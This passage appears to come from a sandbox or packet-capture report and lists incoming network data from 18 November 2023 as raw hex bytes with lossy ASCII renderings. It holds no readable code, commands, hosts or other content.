2023-11-18 09:02:40 UTC	4986	IN	Data Raw: bd 32 8f 78 9f 33 dc ba 3d c3 2d 78 c9 a4 63 c9 4b 16 93 4a 3f 9e 7c c9 20 f4 88 b8 2f aa 49 7f 75 cf 57 0b 57 36 5d 43 57 36 e3 0a 52 4c 4b ee d5 f4 b4 44 8f c9 37 d5 f0 51 e6 39 11 8f bb 3e 86 b5 3c fb ac 7d 4e 32 6b 7b 92 21 71 b5 6a 98 b8 3a c4 79 6c 3f f6 c7 73 c9 3e 58 3c 88 d4 d4 55 54 f0 40 1a f6 1d bb 86 aa d1 bc d0 6f e4 76 d2 03 6e e5 76 7a 44 90 69 ba 46 f7 0e 60 93 de e3 d7 cb 28 df c7 3e e8 3d 80 f4 3e 36 52 38 b9 29 a5 70 7a c4 b9 8e ff 23 90 74 ac 73 f6 d9 cb b3 cf 8e c0 d6 ea ee f2 ec b3 57 c5 86 13 e9 39 62 7f 5e 4d 6d 6f 52 f7 c1 2d 42 c4 1a fd 1d 3b 61 6d 9d 03 e5 ab 7d c4 56 f3 2e d0 50 c1 a8 f5 1c e8 52 c1 76 1c 3d d1 ca 02 66 26 fd f1 32 92 72 b0 91 b8 86 d8 48 42 8c bd 8f 7b 25 36 92 10 a7 af 21 02 5d ea 6e ec a3 aa 29 a5 13 0d 71 Data Ascii: 2x3=-xcKJ?\| /IuWW6]CW6RLKD7Q9><}N2k{!qj:yl?s>X<UT@ovnvzDiF`(>=>6R8)pz#tsW9b^MmoR-B;am}V.PRv=f&2rHB{%6!]n)q
2023-11-18 09:02:40 UTC	5002	IN	Data Raw: 56 ad 7a 25 13 62 41 aa f4 54 15 55 7a 20 a1 d2 e3 dc 5d 54 e9 81 5c c7 bc 5a b4 80 08 72 74 dc 3f 7e 5c 46 e0 88 28 55 b7 e7 55 a2 a2 82 3a 74 a9 2e f2 a8 4a 32 0c 4f f2 58 9b 48 55 d9 a5 52 68 b0 c0 0e 92 44 39 45 5f 32 43 e6 fd ba 8c 24 c3 39 78 84 54 15 ae 19 5f 55 95 ae 19 61 ee 19 cf 4e b9 c8 24 1a 2c 98 fb c0 92 88 1c b7 03 a8 0a a5 f0 5e 8e 73 22 50 7e c1 97 8c 03 9d ab 2a 75 49 78 e9 fb 52 9d a8 b0 00 1a 61 36 17 88 ad 2a ce 7c 22 c4 aa ea 67 5f b0 12 b1 55 15 21 c1 72 ee 26 2a 2a c0 99 e1 7f 2f 23 73 74 2f af 89 24 03 21 c1 72 fa 00 35 76 b0 22 3e 43 6e 5e 89 d8 dc b0 e5 5e 1e dd b0 e5 16 47 9d f3 68 6e 9d 1a c4 8a 68 56 b9 fa 24 92 f0 7e 8f 83 a3 f3 cc f0 92 e3 66 a4 42 21 75 30 1c 6c 79 02 48 a4 56 41 7f 65 19 d2 5f 95 30 6d 1c 75 73 48 7f f5 Data Ascii: Vz%bATUz ]T\Zrt?~\F(UU:t.J2OXHURhD9E_2C$9xT_UaN$,^s"P~uIxRa6\|"g_U!r&**/#st/$!r5v">Cn^^GhnhV$~fB!u0lyHVAe_0musH
2023-11-18 09:02:40 UTC	5018	IN	Data Raw: c6 40 57 32 b6 99 38 9d ec 09 24 d7 f6 30 34 06 92 8e 8e 07 1f fe 70 42 ea 55 e7 ad 4c 4a e8 56 e6 25 51 8a d0 ab 68 20 8d 1c 79 91 72 5e 11 49 c7 a8 d0 37 a1 61 46 db 1e c9 50 75 2e 90 cf 53 f3 6a 3a a1 2d 48 a6 a7 75 af 9c 9e 96 16 f9 59 13 6e ba c6 21 48 da 7d 7e d1 00 1f db 7d 10 3e 5e 56 b5 40 d2 31 47 7d 84 03 c5 38 de cf d5 aa 5e 11 85 c4 ea db 35 47 a0 21 06 0b b5 7c f9 f5 93 48 12 ac bb 92 12 8f 52 f3 93 ac e3 52 20 35 f5 ec d3 07 19 09 35 77 d7 3c b6 d9 4e 34 cc c0 7a c5 2b 3a 21 2a 47 91 87 74 11 14 9a 62 6c f3 8a 28 fe f3 7e f4 2a e2 28 a4 a6 fa 9d 37 ee 42 6a 6a f4 3a 41 02 85 d3 14 c9 e9 62 17 40 e3 b6 c4 ac ac f2 42 d2 b1 f8 9e ff 22 c6 f2 7b de 51 66 b2 24 88 2e 33 6a eb 1c 48 12 91 f7 dc 12 ce 49 fe 1e e0 cf 72 69 16 ba c4 28 cf 01 21 49 Data Ascii: @W28$04pBULJV%Qh yr^I7aFPu.Sj:-HuYn!H}~}>^V@1G}8^5G!\|HRR 55w<N4z+:!Gtbl(~(7Bjj:Ab@B"{Qf$.3jHIri(!I
2023-11-18 09:02:40 UTC	5034	IN	Data Raw: a1 09 24 fd 96 c2 71 fa af c5 43 24 76 43 14 b2 f0 eb 13 1d ae 90 ab 82 46 bf 38 46 fa 51 e9 a1 c2 21 9f 22 90 33 fe 25 42 e6 58 fe 3e 42 92 b1 5d 4e 0a 89 a3 ae 1a bf b8 20 cb eb 79 6c c7 d7 42 12 7e f0 94 aa 61 07 d2 7f 7e d6 8d 62 aa d2 8d e2 43 6e 77 13 42 25 e3 fa d0 58 43 27 04 a1 6a d5 f5 2c c0 d1 e1 0a 5d 2e b8 de 69 15 d1 70 c1 c8 d9 a0 50 57 c1 66 ac 21 d2 56 74 b5 ed c4 52 c8 c2 8f cf b5 c9 50 1a 06 90 cc 84 10 0e 65 42 40 cc 37 5f bb b1 f0 f3 e3 e9 73 55 46 52 73 38 23 29 48 9c e2 23 e3 ec 9e 0c 48 48 bb b5 ea ec 69 d5 79 ee ad 3a cf b4 ea 64 3e b2 70 28 1f 19 c8 2b d7 1c 42 e6 b8 e3 c5 2a f4 1f a6 ae 24 d9 82 db 46 ee ff 69 aa 38 73 29 3b a2 db 6a 4b b2 a2 ad f6 fd 8f d2 85 44 26 80 78 1b 64 30 40 90 2c 3e 0e 20 06 c9 d8 bb 15 8e ad 33 c3 9a Data Ascii: $qC$vCF8FQ!"3%BX>B]N ylB~a~bCnwB%XC'j,].ipPWf!VtRPeB@7_sUFRs8#)H#HHiy:d>p(+B*$Fi8s);jKD&xd0@,> 3
2023-11-18 09:02:40 UTC	5066	IN	Data Raw: 4e dc 92 a9 1d 43 56 b5 8f 74 ab da 5f d8 25 43 56 35 f3 fc 9b 7c c7 22 04 1d eb 1b 18 61 35 00 5a 62 ec 29 b3 3a 90 b7 a3 ad e6 71 d5 20 e1 08 df 63 7e 1b f8 13 76 51 a0 43 c6 3c 61 1d 04 6a 64 ac 34 59 4c c5 f7 71 d2 4d 48 98 db 81 54 d4 be a1 dc 51 28 bf 23 0e 0d 53 81 7f 40 a6 c9 1b 88 ca cf 73 6f d6 ca 90 18 6f 0b 7b 22 10 95 23 22 50 48 4c de 66 4c 0b bd 52 74 9c f5 86 0e 33 d7 a6 c4 e2 28 99 36 4f f7 6c f9 d9 bc 05 98 0c fc 23 09 ba 9e 82 9c f4 87 13 92 c4 9c 71 3e 07 1a 64 ac 3e b3 56 86 58 2b 8f 3b 92 12 70 e6 76 f2 28 74 2c d0 50 03 6f e4 3f 17 92 8e 7b 4b 3b ae 8c 67 96 a4 23 2d c2 40 8d 0c 3f fc 50 02 0f e9 c9 18 b9 2f 01 92 44 b9 89 03 1a 64 ac 27 fb ca d0 51 51 fe a0 22 24 56 8f 5a ed 34 fc 02 05 23 0d bf 40 52 7e f4 ac 59 e8 90 71 d3 58 03 Data Ascii: NCVt_%CV5\|"a5Zb):q c~vQC<ajd4YLqMHTQ(#S@soo{"#"PHLfLRt3(6Ol#q>d>VX+;pv(t,Po?{K;g#-@?P/Dd'QQ"$VZ4#@R~YqX
2023-11-18 09:02:40 UTC	5082	IN	Data Raw: 4c 9f c8 e6 44 74 98 e4 98 b9 26 4e 58 a4 14 c7 f2 4c 64 54 c7 e4 f8 46 0e 3b fc 58 92 c3 7e 2c 87 0c 1f fb e2 d8 3e 78 4d 1a 73 9b 23 8d b9 83 7c af 79 95 c6 dc 41 ee ba 8c 02 a9 83 5f 25 db 13 b2 8c a7 b7 4b c6 93 0b f2 6d fe 0d e4 d1 fd 9e 7d 8d ee 67 b7 9b 43 b6 7b a5 fe 5a ae d4 5f bb 57 ea 2f 75 19 f3 83 d3 78 72 d8 69 fc 90 30 eb 49 0e 9b f5 04 f9 7d 17 c7 c8 25 fc bb 7c 7e 88 dc f3 38 b8 17 c7 cc 25 3c 32 53 5e 1c df 9b 63 15 c7 be e2 b0 19 fb 21 91 4d 30 39 56 2e fa b7 19 3b 91 ab 8a 13 cb c5 91 8b fe 07 2b a4 e4 b0 15 52 90 ef 3d 56 b6 9a 0c 72 3e 57 cf ed 6b 19 e4 bd 7f 7c 3b f7 8f d3 be 6b 74 03 89 63 3d f7 6e b0 9e dc 0d d6 5b f6 25 44 e6 78 f7 f5 0f ae d4 14 cd 35 ee 95 7a 8d 5c a9 d7 18 d7 7a b5 86 d5 09 f0 a8 dc 17 c7 e7 0e ae 79 af ed 6b Data Ascii: LDt&NXLdTF;X~,>xMs#\|yA_%Km}gC{Z_W/uxri0I}%\|~8%<2S^c!M09V.;+R=Vr>Wk\|;ktc=n[%Dx5z\zyk
2023-11-18 09:02:40 UTC	5098	IN	Data Raw: 32 44 0b c1 d9 57 4f 5c d1 ef c9 15 c1 6c 8c 58 22 2f 7f b5 73 86 2c 52 19 66 2e a9 87 c1 69 22 a8 d8 b8 22 7d b6 ed fc 7f cd e1 44 64 35 8e f9 ae 88 ac d6 ce e8 17 90 f7 d5 fe 6a f1 23 0d 91 57 77 5b 3c f3 ec 44 27 75 e2 be 6e ad b6 7f fb 24 75 04 be b7 ad 8f 97 a8 49 d0 dd 5d ec 47 04 1d 77 31 4b 5a 60 df d4 30 42 43 e6 68 0f b1 03 a1 21 ab f3 ff fc f1 49 a2 ba 3a c9 9a 1a 9c 64 b5 a4 2f 46 a3 f0 30 15 5b d2 27 f4 a9 11 13 fa cd 11 57 37 92 43 51 2b 33 f0 96 c6 e2 fb 61 49 fb 4c 64 19 8b cf 84 25 cd 34 f9 c7 df 3e 49 91 95 8d 71 d9 f2 11 d3 8f f7 ff f7 8a bb 33 21 34 2c 10 5f 95 11 61 f9 2c d9 32 72 3d 94 02 77 b3 fa bf 4f 52 64 25 8b 17 bf e0 c4 e2 65 49 0f 60 94 59 11 c0 c8 93 36 96 b8 e9 1e 8a ac dc 8b 35 35 f0 62 f5 a4 59 3f 52 03 eb 87 25 3d 96 45 Data Ascii: 2DWO\lX"/s,Rf.i""}Dd5j#Ww[<D'un$uI]Gw1KZ`0BCh!I:d/F0['W7CQ+3aILd%4>Iq3!4,_a,2r=wORd%eI`Y655bY?R%=E
2023-11-18 09:02:40 UTC	5114	IN	Data Raw: 94 78 2d c8 99 9e 2f 42 12 ce 40 1a 9c 1f 77 06 d2 18 b7 62 40 70 1a dc 19 03 22 0e 0f 3d 7d 65 88 a6 5a b5 6a be 22 0b b1 aa 72 c1 37 9c db 04 51 53 01 62 dd 7f 77 81 62 dd 8f f0 9a 49 f3 0b 21 17 20 ec 98 7e 12 20 c9 b8 67 be c4 09 b1 b9 08 75 ef 43 2a 90 06 f5 be 3e b4 9a 3f 22 90 aa e2 81 5e e3 aa e4 81 fe 2e 61 fd 93 1d 05 24 19 61 e9 28 f3 6f 20 1d 6b ef 42 17 25 8d 92 62 17 a5 e8 ef 50 09 a7 0c a7 e0 08 b2 d7 95 e3 0a 48 05 61 8b 91 13 07 48 3f c9 7a ce 62 49 24 19 4c ab fd cd 1c 8a fc 05 8b d2 35 de 38 94 0b 7b 44 8c fe db fa 76 22 8d f6 7d a3 aa b9 d1 13 b1 55 7b ed 08 b3 05 8d 2b a0 a6 02 1e 26 fe 7d 25 92 8c 32 de 66 2d 90 ab 82 19 a2 c6 2e f2 57 4b 78 2d 19 ef 55 88 5f 5e 1b 34 f4 ea 5a 20 c9 78 4b fa 24 a4 56 75 7a 5a 7c 79 19 69 ec d6 48 2b Data Ascii: x-/B@wb@p"=}eZj"r7QSbwbI! ~ guC*>?"^.a$a(o kB%bPHaH?zbI$L58{Dv"}U{+&}%2f-.WKx-U_^4Z xK$VuzZ\|yiH+
2023-11-18 09:02:40 UTC	5146	IN	Data Raw: fc f9 95 48 b3 db 8f cf 04 3c eb b5 e5 0c b2 f4 5c e1 80 d4 d4 18 f5 96 90 3f 43 90 f3 1c 65 88 9a 19 b1 bc fe fd a7 19 5e 5e 3b 03 f2 52 62 79 85 eb 4c 8e 9d 12 b9 93 41 be a6 27 25 a6 bc 13 5e 72 21 2f a7 5e 1c 20 49 6c 66 d9 94 c4 fe e4 93 c8 10 0c 6e b6 89 a8 7c a0 c2 89 9b 1a 1f 9b 45 ca bb 8e f5 3c be 12 51 79 84 f3 b5 fc 6b 81 a8 7c f0 7a 40 9b 89 91 d7 03 61 96 7e 7c 33 2a 24 e5 2d 7c a8 53 47 53 f5 ba 20 61 67 d0 7f 0e e4 a6 10 fa 96 12 0a 7d 83 93 5d e6 0a 13 52 53 e3 84 2e 08 a9 bb a8 c1 f1 d3 bf d5 ab e9 9b b8 12 15 04 97 2d c2 44 ea 2e 0a 67 78 12 c7 ca 97 73 b0 ce 8f 27 d1 75 7e 56 58 f7 c7 c8 fd 15 50 13 03 8b be 74 cc 4f 2e fa 93 c5 79 34 c0 e9 e2 3c 20 c7 e9 15 d0 12 23 4c 77 3a 2e 05 92 b1 26 c8 e9 e2 55 42 6e 2a f6 16 47 c7 f2 ae ef 25 Data Ascii: H<\?Ce^^;RbyLA'%^r!/^ Ilfn\|E<Qyk\|z@a~\|3$-\|SGS ag}]RS.-D.gxs'u~VXPtO.y4< #Lw:.&UBnG%
2023-11-18 09:02:40 UTC	5162	IN	Data Raw: 50 c7 9c 00 24 1d 03 a1 3d ee a0 5d 87 1a e3 6e f3 e7 8c ab 3b 35 b5 c2 54 94 1d 0c a4 a6 16 3c 20 dc c1 d5 7c 88 5b 51 59 e8 0c fb 5a 3e c4 2d 96 5e 75 07 57 da 32 d6 7e b7 65 00 49 c7 8e 97 e0 dd 6b 20 2d 32 c8 79 99 cb 92 33 60 82 44 e6 48 3f ae 32 47 3e e4 7e a1 38 8f b6 e7 40 c3 0c 2c 19 7f 5d 89 8a 19 c7 6c 48 b4 cc 58 25 b7 e7 40 4d 8c 70 56 38 4d 55 4f 9f 28 ff 70 8c 67 40 d6 81 3c c2 29 d1 7c 76 c6 6f 33 77 c8 f8 6d ba 1f e1 1d 79 24 ba 3f 77 fb 15 37 60 47 c7 f6 f1 f5 f9 a1 a0 ba fc af 2b 91 74 dc 08 b5 d2 20 06 b2 0e e4 77 60 60 a1 90 74 c0 a9 dd b3 04 48 4d 55 b8 34 7f d6 e8 d6 e9 53 ea 6e f0 99 d0 84 03 d2 90 74 dc 92 b9 83 5d b7 64 41 36 57 06 32 92 8e 1e 35 00 7d ec 8b 14 ca 9a ed 3b 12 b9 74 7f d5 80 a4 63 20 64 4c f3 0a 48 fd 98 58 7d fc Data Ascii: P$=]n;5T< \|[QYZ>-^uW2~eIk -2y3`DH?2G>~8@,]lHX%@MpV8MUO(pg@<)\|vo3wmy$?w7`G+t w``tHMU4Snt]dA6W25};tc dLHX}
2023-11-18 09:02:40 UTC	5178	IN	Data Raw: c4 89 e5 c9 79 9c 9d 9c 7f fc f1 51 94 13 1b 71 62 53 be bd 09 9b 35 65 b3 f0 32 20 f2 32 20 26 6c 56 5e 06 04 5e 06 44 5e 06 c4 8c 73 ca cb 80 c0 cb 80 c8 cb 80 c0 cb 80 c8 cb 80 58 68 4e 29 37 a3 74 76 ca fc f8 de 3d e5 d9 6f da b7 54 94 27 b2 e9 ec 44 f6 e5 f3 47 51 8e 64 38 52 9e 5e 26 c7 39 79 8e e4 38 52 9e 5e a6 c0 91 f2 4c 31 05 8e 94 27 7d 29 e1 48 79 fe 96 ce ce df de fd c7 83 28 4f c5 52 85 23 e5 59 55 aa 70 4e f9 65 6c aa 71 a4 3c ab 4a 35 8e 94 27 48 a9 c1 91 f2 0c 24 b5 58 94 27 13 a9 c3 a2 3c 5a a7 1e 8b f2 70 98 06 2e ca b5 37 e0 da cb 83 54 1a f1 93 9b 87 9a 34 b6 54 94 47 8d 34 e1 9c 72 b7 9c 66 2e ca b7 37 e3 db cb ef 4c d2 82 23 e5 d7 1f 69 a1 55 5e 1d c9 e6 a3 ec 58 48 4c 53 97 1a 1a 67 5f 8a 36 ba e6 67 bf be 2f 54 72 7b 61 2c 56 92 Data Ascii: yQqbS5e2 2 &lV^^D^sXhN)7tv=oT'DGQd8R^&9y8R^L1'})Hy(OR#YUpNelq<J5'H$X'<Zp.7T4TG4rf.7L#iU^XHLSg_6g/Tr{a,V
2023-11-18 09:02:40 UTC	5194	IN	Data Raw: 97 da 8f 97 b4 1f 2f b5 1f 2f df 27 fc fb a0 fd 78 49 fd 2f d5 ff 92 f6 e3 a5 fa 5f fe e4 7f ff 67 7f 9a df 87 3e bf ab ff 25 f5 bf 54 ff cb 0f cd 4f fd 2f a9 ff a5 fa 5f 7e 4e f6 be 7e aa ff e5 07 e6 57 ea 7f 75 83 f9 95 fa 5f 51 ff 2b f5 bf ba 41 0f 2f f5 bf a2 fe 57 ea 7f 75 3b e8 f1 dd 75 bb 27 dd df a9 db c1 f7 f9 4a fd af a8 ff 95 fa 5f 2d f8 f7 af d4 ff 8a fa 5f a9 ff d5 82 fd 5c a5 fe 57 d4 ff 4a fd af d6 41 8f 4f f3 a3 fe 57 ea 7f b5 e0 fd b3 d4 ff 8a fa 5f a9 ff d5 86 7e 5b ea 7f 45 fd af d4 ff 6a 27 dd 9f e6 47 fd af d4 ff 8a fa 5f a9 ff 15 f5 bf 52 ff ab 4d af 3f f5 bf a2 fe 57 ea 7f 15 37 f6 29 d8 52 ff 2b ea 7f a5 fe 57 74 7d cc 52 ff 2b ea 7f a5 fe 57 d4 ff 4a fd af a8 ff 95 fa 5f c5 c9 ea 59 a5 fe 57 d4 ff 4a fd af 92 5e 7f ea 7f 45 fd af Data Ascii: //'xI/_g>%TO/_~N~Wu_Q+A/Wu;u'J_-_\WJAOW_~[Ej'G_RM?W7)R+Wt}R+WJ_YWJ^E
2023-11-18 09:02:40 UTC	5226	IN	Data Raw: 76 65 0b 1e 9f 62 57 86 ed ca c4 ae 6c a1 6b ed 4c ec ca b0 5d 99 d8 95 e1 3a 3a 13 bb 32 6c 57 26 76 65 2b 7d 8f 8b 89 5d 19 b6 2b 13 bb b2 15 8f 4f b1 2b c3 76 65 62 57 b6 d2 b9 a0 89 5d 19 b6 2b 13 bb b2 35 f0 b1 95 fe c4 76 65 62 57 76 bf d1 6b 82 d8 95 61 bb 32 b1 2b c3 ef 11 35 b1 2b c3 76 65 62 57 76 65 57 ff 1a db 94 fe c4 76 65 62 57 76 0f 98 07 33 b1 2b c3 76 65 62 57 86 df 23 6a 62 57 06 ed ea b5 a5 f4 27 fe d6 9f 89 5d 19 ae a3 33 a9 a3 33 fc 1e 51 93 3a 3a c3 5e 66 e2 65 f6 08 38 e7 35 f1 32 c3 5e 66 e2 65 b6 d1 b5 93 26 5e 66 d8 cb 4c bc cc 36 ba 56 c0 c4 cb 0c 7b 99 89 97 d9 86 fb 53 bc cc b0 97 99 78 99 61 2f 33 f1 32 c3 5e 66 e2 65 b6 e3 eb ad 78 99 61 2f 33 f1 32 db f1 fc 53 bc cc b0 97 99 78 99 ed 3b 74 41 93 3a 3a c3 75 74 26 75 74 76 Data Ascii: vebWlkL]::2lW&ve+}]+O+vebW]+5vebWvka2+5+vebWveWvebWv3+vebW#jbW']33Q::^fe852^fe&^fL6V{Sxa/32^fexa/32Sx;tA::ut&utv
2023-11-18 09:02:40 UTC	5242	IN	Data Raw: c1 cc 31 98 dd cf b0 94 d9 eb c4 f3 e9 18 cc 70 ba cd 1c 83 19 66 30 73 0c 66 03 ef d9 8e c1 0c 27 f9 cc 65 f9 6c 6e 54 a7 cb f3 19 e6 3e 73 dc 67 13 f7 d3 71 9f 61 ee 33 c7 7d 76 e1 f9 f4 dc 87 13 8c e6 32 8c 76 3f c3 92 5c d7 cf 8b f6 33 6e ae 1a 94 fd b2 e3 47 cb a0 92 15 eb 6c 4e e7 cb b8 ec 7f 44 d2 e9 c4 fd 0c be ea 95 ee 2b 6f 2d 55 27 66 ea e8 98 3a 86 86 75 ba 7e 62 a6 8e 8e a9 a3 6d d0 f7 45 c7 d4 d1 70 3f dd 97 d2 ef cf ac a4 d8 5c 3f 79 11 b3 af 62 8e 78 3e a3 eb 27 ce 19 47 97 33 8e 91 b2 66 74 39 e3 88 63 87 e8 62 87 f8 32 76 f8 f5 17 91 74 3a f1 d8 ba fc 6d cc 78 6c 5d fe 36 e2 d8 21 ba d8 21 16 1a 97 45 17 3b 44 1c 3b 44 17 3b c4 82 d7 a7 8b 1d 22 8e 1d a2 8b 1d 22 8e 1d a2 8b 1d 22 8e 1d a2 8b 1d de 9e e1 6f e3 bd b5 94 da 94 88 63 87 e8 Data Ascii: 1pf0sf'elnT>sgqa3}v2v?\3nGlND+o-U'f:u~bmEp?\?ybx>'G3ft9cb2vt:mxl]6!!E;D;D;"""oc
2023-11-18 09:02:40 UTC	5258	IN	Data Raw: bf f5 95 3f 5f 35 d1 a7 f6 95 0e 5f e9 e5 23 3d bb c3 57 ba f6 95 0e 5f e9 a5 da ef 27 7c a5 eb 3c be 23 8f ef d5 ee c3 e8 c8 e3 bb ce c6 3b b2 f1 ae df af d9 91 8d 77 ed 48 1d 8e d4 9b 75 c1 ce 9f 6a d5 8e d4 e1 48 5d ef 8f ef c8 c6 bb ff 7d 58 fe 40 ac 7e 47 4e e7 4f c4 6a 47 ea 70 a4 ae 1d a9 c3 91 ba 76 a4 0e 47 ea fa f7 00 3a 1c a9 6b 47 ea 70 a4 3e ed 33 e1 1d 8e d4 b5 23 75 38 52 d7 8e d4 e1 48 5d 3b 52 87 23 f5 65 df 13 d1 e1 48 5d 3b 52 87 23 75 ed 48 1d 8e d4 b5 23 75 38 52 d7 8e d4 e1 48 5d 3b 52 87 23 f5 6d 33 c6 0e 47 ea da 91 3a 1c a9 6b 47 ea 70 a4 ae 1d a9 c3 91 ba 76 a4 0e 47 ea c7 f6 39 e0 48 e3 63 bf 9f e3 83 9f ab d6 8e 34 e0 48 43 3b d2 80 23 0d ed 48 03 8e 34 c2 47 f2 d0 80 23 0d ed 48 03 8e 34 f4 3e a9 01 47 1a da 91 06 1c 69 7c bf Data Ascii: ?_5_#=W_'\|<#;wHujH]}X@~GNOjGpvG:kGp>3#u8RH];R#eH];R#uH#u8RH];R#m3G:kGpvG9Hc4HC;#H4G#H4>Gi\|
2023-11-18 09:02:40 UTC	5274	IN	Data Raw: 67 4a c6 bb a0 e3 5e b8 f7 56 f3 cd dd b7 e6 c4 63 2b 40 b7 5f 58 6f 05 e9 76 cc 74 bb 40 dd 7e e1 3a 05 eb 76 cc 75 bb 80 dd 8e c9 6e 17 b4 db 31 db ed 02 77 3b dc 4a fd fa 49 c9 89 eb 14 c0 db 2b be 9f 82 78 7b c5 75 56 a9 b3 b2 e9 c5 d7 4f 4a 4e 5c a7 49 9d 86 ef a7 49 9d 98 65 77 81 d9 dd 70 9d 82 b3 bb e1 3a 9b d4 d9 28 61 ee 4d ea c4 0c bd 0b 44 ef ad d0 59 47 c1 e8 1d 73 ed 2e 60 bb 63 b2 dd bb e6 c4 63 eb 32 b6 8e 9f 21 97 b1 c5 3c bd 0b 50 ef ce 96 5b 5f 3f b9 e4 0c 98 6f 83 f0 6d d8 e8 73 1b 36 cd 49 c7 36 08 df 06 cc b7 41 f8 36 60 be 0d c2 b7 61 c7 75 0a df 06 3e 7f ad 13 d8 0f b7 35 7f fe 71 89 5c 73 62 be 0d c2 b7 21 6e 3b ac 33 ce af 4e 78 f9 37 1e 5b e1 db 10 e9 73 1b 84 6f 03 e6 db 20 7c 1b e0 d7 c7 be 7e 52 72 e2 b1 15 be 0d c7 46 eb 14 Data Ascii: gJ^Vc+@_Xovt@~:vun1w;JI+x{uVOJN\IIewp:(aMDYGs.`cc2!<P[_?oms6I6A6`au>5q\sb!n;3Nx7[so \|~RrF
2023-11-18 09:02:40 UTC	5306	IN	Data Raw: 5b 3f 09 4e 93 c5 3e ac ef ab ea e6 e1 40 03 1c 68 1e 0e 34 c0 81 d6 f4 6d b1 01 0e 34 0f 07 1a e0 40 f3 70 a0 01 0e 34 0f 07 1a e0 40 f3 06 cc 06 38 d0 3c 1c 68 80 03 cd c3 81 06 38 d0 3c 1c 68 80 03 ad 6b 91 ab 01 0e 34 0f 07 1a e0 40 eb ea 83 f5 ef 4d 31 9a 5f 37 c0 81 e6 e1 40 03 1c 68 1e 0e 34 c0 81 e6 e1 40 03 1c 68 1e 0e 34 c0 81 16 da f0 dc 00 07 9a 87 03 0d 70 a0 79 38 d0 00 07 9a 37 60 36 18 30 9b 37 60 36 18 30 5b fa 99 4c cc 64 0e 8b da 5f 9a 62 34 3f 93 b0 7b b6 d4 0f 4f 2d 39 93 7e 07 00 b3 b4 a1 13 43 1a 30 4b f3 98 a5 01 b3 b4 d7 63 79 5b 04 66 69 de ee d9 60 f7 6c 8f ed 9e bf fe e3 b3 1b 46 f3 eb 06 a8 d3 46 f9 73 c3 ba 8d bb 1e 6d 62 dd a6 7e 11 6b 13 eb e6 11 52 03 42 6a 53 1b c2 1a 10 52 f3 08 a9 01 21 b5 e9 f7 1b 10 52 f3 08 a9 01 21 Data Ascii: [?N>@h4m4@p4@8<h8<hk4@M1_7@h4@h4py87`607`60[Ld_b4?{O-9~C0Kcy[fi`lFFsmb~kRBjSR!R!
2023-11-18 09:02:40 UTC	5322	IN	Data Raw: c5 01 bc ff fb 03 bd 6e 2f bd 6e ff b9 d7 6f bf a2 d7 fd a5 d7 e3 df d5 d0 30 8b 7e 85 a0 be c8 ba fa 15 82 fa 22 cb f3 bb 05 7e b7 ae da b3 b1 c0 ef 96 27 6a 0b 44 6d dd 9a f5 7d 2f 10 b5 e5 89 da 02 51 5b 37 7d df 5e 20 6a cb 73 a0 05 0e b4 7c b5 e5 75 67 34 7f d5 02 07 5a be 76 c4 02 07 5a 9e 03 2d 70 a0 d5 76 fb 86 bf c0 81 96 f7 d8 2e 78 6c 57 d3 6a d8 82 c7 76 79 ea b4 40 9d 56 2b 3f 36 e4 cd 53 a7 05 ea b4 ba 7e 2a 5f a0 4e cb 53 a7 05 ea b4 ba f6 da 2c 50 a7 e5 3d b6 0b 1e db d5 b5 86 b3 e0 b1 5d 9e 71 2d 30 ae 8f df a7 d3 69 13 b7 8e ef 4d 4f 9f fb 9e c4 35 f6 7b d3 f3 4b df f3 d6 9b 8c fb ad 69 ff dc b7 9b ec ff d9 34 5e fb 7e a5 9b 7c 8a 7b db 5e e7 ea 7c 73 eb e0 d1 f4 fe b9 ef 57 57 a9 4f 7f 73 fb dc 77 e9 bf f9 b2 7d ea 7b 79 fc 8f b7 a7 1b Data Ascii: n/no0~"~'jDm}/Q[7}^ js\|ug4ZvZ-pv.xlWjvy@V+?6S~*_NS,P=]q-0iMO5{Ki4^~\|{^\|sWWOsw}{y
2023-11-18 09:02:40 UTC	5338	IN	Data Raw: 66 ed f5 a1 a1 0f ed b7 33 6b e8 43 7b 7d 68 e8 43 a7 4e b1 1b fa d0 5e 1f 1a fa d0 be 01 d1 d0 87 f6 fa d0 d0 87 f6 fa d0 d0 87 f6 fa d0 d0 87 4e 7f de a0 0f ed 3d a0 e1 01 5d da 71 1a 1e d0 de 03 1a 1e d0 35 7e 34 cc a4 ef 07 34 fa 01 ed 6f e2 d2 c5 99 f4 57 00 fa 01 dd 3a 31 6c f4 03 da 5b 47 c3 3a ba fd 37 05 58 47 7b eb 68 58 47 b7 3f 6f b0 8e f6 d6 d1 b0 8e ee a7 7f 6e 38 6f de 3a 1a d6 d1 e3 3f 71 60 1d ed ad a3 61 1d ed b7 33 6b 58 47 7b 7d 68 e8 43 fb 36 42 43 1f da eb 43 43 1f 7a eb 86 5f 43 1f da eb 43 43 1f 7a 8f 5d a7 d0 d0 87 f6 fa d0 d0 87 de fe db eb e6 4c fa d7 24 f4 a1 7d 3f a0 a1 0f ed f5 a1 a1 0f 7d fc b7 20 e8 43 7b 7d 68 e8 43 fb 7e 40 43 1f da 7b 40 c3 03 fa f2 ef ca f0 80 f6 1e d0 f0 80 be fc 4c c2 03 da af d8 6f ac d8 ef 6b f4 6f Data Ascii: f3kC{}hCN^N=]q5~44oW:1l[G:7XG{hXG?on8o:?q`a3kXG{}hC6BCCCz_CCCz]L$}?} C{}hC~@C{@Loko
2023-11-18 09:02:40 UTC	5370	IN	Data Raw: e8 32 c7 5e e0 98 fc 28 ba ce b1 2f d6 e7 ff fe eb 31 f6 3a c7 5e 79 de 6d 8a ad a2 fd 3b af 1b 2f 5f 68 a6 71 f5 c3 0b 4d ec 3c ef bc 6b 8c c2 79 e7 f5 ea e3 17 38 ef 32 cf a3 85 e7 9d d7 ba 3a f3 79 74 9e e7 d1 f9 d4 68 ff 9e e7 79 74 3e 05 ff 9b 97 39 f6 cc ff e6 cb 1c 7b a1 e3 f9 3c cf 85 f3 69 e5 79 af 73 ec 95 b7 d5 36 c7 6e 3c ef 6d 8e bd fd ff b1 7f fc f3 18 bb cf b1 3b dc fd 7e 14 ed 53 2c 9f bf f3 33 b4 5e ee d7 8f 63 63 de b0 7f fc 02 e7 bd ce f3 e8 ea 3c 6f cc b1 78 3f 59 d7 65 8e bd f0 bc eb 1c bb 06 ae ef 3a cd a3 eb b5 e8 33 e5 ba cd 79 f9 1a 7b 9d d7 d8 eb cb f7 f2 5f 0f b1 f3 1a bb f1 3e da e6 3e da a2 68 5b 6d 73 1f 6d bc 8f b6 b9 8f 36 ac b3 d4 76 9d 63 79 3b 6f 73 3b 6f 3b 38 39 fe 59 74 6e e7 5b e1 bc 3f bc 86 ee 0d 3f 